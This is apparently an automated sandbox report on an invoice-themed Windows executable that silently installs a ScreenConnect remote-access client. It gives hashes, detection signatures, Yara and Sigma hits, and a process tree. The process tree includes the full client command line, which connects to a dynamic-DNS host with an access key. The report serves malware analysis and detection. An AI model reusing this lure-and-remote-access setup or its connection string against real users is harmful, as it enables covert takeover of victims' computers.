Edit tour
Windows
Analysis Report
invoice-benefits-agency9-24-2024.exe
Overview
General Information
| Sample name: | invoice-benefits-agency9-24-2024.exe |
| Analysis ID: | 1523872 |
| MD5: | 00cd8ce405a29bad77e5caec894b44a0 |
| SHA1: | 016154e4ea41864e8c4b689c9f7ac7cceda5c7db |
| SHA256: | ec0f1ec3f107b3559c97f1db4f9a1ae04481f2893c20b2e071f855309d7cc8ed |
| Tags: | exefiledn-comuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
ScreenConnect Tool
| Score: | 48 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Compliance
| Score: | 32 |
| Range: | 0 - 100 |
Signatures
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Enables network access during safeboot for specific services
Initial sample is a PE file and has a suspicious name
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Uses dynamic DNS services
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool
Classification
- System is w10x64
invoice-benefits-agency9-24-2024.exe (PID: 7540 cmdline: "C:\Users\ user\Deskt op\invoice -benefits- agency9-24 -2024.exe" MD5: 00CD8CE405A29BAD77E5CAEC894B44A0) 
msiexec.exe (PID: 7640 cmdline: "C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\AppData\ Local\Temp \ScreenCon nect\e6cb7 7284cf765a a\setup.ms i" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- msiexec.exe (PID: 7704 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 7756 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng BC344CC 8D534C1531 46082E5C0B 08418 C MD5: 9D09DC1EDA745A5F87553048E57620CF) 
rundll32.exe (PID: 7808 cmdline: rundll32.e xe "C:\Use rs\user\Ap pData\Loca l\Temp\MSI 22D5.tmp", zzzzInvoke ManagedCus tomActionO utOfProc S fxCA_61039 06 1 Scree nConnect.I nstallerAc tions!Scre enConnect. ClientInst allerActio ns.FixupSe rviceArgum ents MD5: 889B99C52A60DD49227C5E485A016679) - msiexec.exe (PID: 7864 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 8260A17 0A10C2A63D D060DA2E17 AE0B9 MD5: 9D09DC1EDA745A5F87553048E57620CF) - msiexec.exe (PID: 7916 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng EC3C4A7 2C16F99939 8D301E804E CE99B E Gl obal\MSI00 00 MD5: 9D09DC1EDA745A5F87553048E57620CF)
- ScreenConnect.ClientService.exe (PID: 7956 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (e6cb 77284cf765 aa)\Screen Connect.Cl ientServic e.exe" "?e =Access&y= Guest&h=mm f351.ddns. net&p=8041 &s=64aa415 8-b0dc-4cf b-a3e6-dfe c05b77827& k=BgIAAACk AABSU0ExAA gAAAEAAQCp DLJbB2UCJQ ST7J%2beAL 4SRxBN9FnG DmzuSSe%2f jH%2bnKBeO QFHQ%2bCr3 LypD1KSb17 oRWP4zVHy7 BT585yzIdt EsLOQJGVUw zeIFWaAKwK fBsHG%2fh8 GYVt85W1oI VuD0heJmJt qEdcOjXvXP D4oJuQHoqh BbYLoSnsbf rTP0R040%2 bcfkCNslvu f01cnsbcAe yUEFRKIz%2 b8o0YJwrix E6vdRb5cxn %2bauV36m9 2%2b6%2fhN C5sRzM45Hr 1FU47wA4rA Ra8OnACYaf p32jE3t2Cm 7EEkMt%2bS 6HWKgaZMp0 VLkBgPw3Wn P85fhslYN9 Uz3EZtsBn% 2f97CFE2jS Av4%2brdgI mA3na8&t=i nvoice&c=c hoicebenef itsagency& c=https%3a %2f%2fchoi cebenefits agency.com &c=choiceb enefitsage ncy&c=&c=& c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447) - ScreenConnect.WindowsClient.exe (PID: 8024 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (e6cb 77284cf765 aa)\Screen Connect.Wi ndowsClien t.exe" "Ru nRole" "b3 9d397f-880 b-4274-a78 8-d5e0ae46 124e" "Use r" MD5: 20AB8141D958A58AADE5E78671A719BF) - ScreenConnect.WindowsClient.exe (PID: 8152 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (e6cb 77284cf765 aa)\Screen Connect.Wi ndowsClien t.exe" "Ru nRole" "2a 312dd1-915 e-4a70-b7f c-6da8f9a2 cf4a" "Sys tem" MD5: 20AB8141D958A58AADE5E78671A719BF)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| Click to see the 5 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| Click to see the 4 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||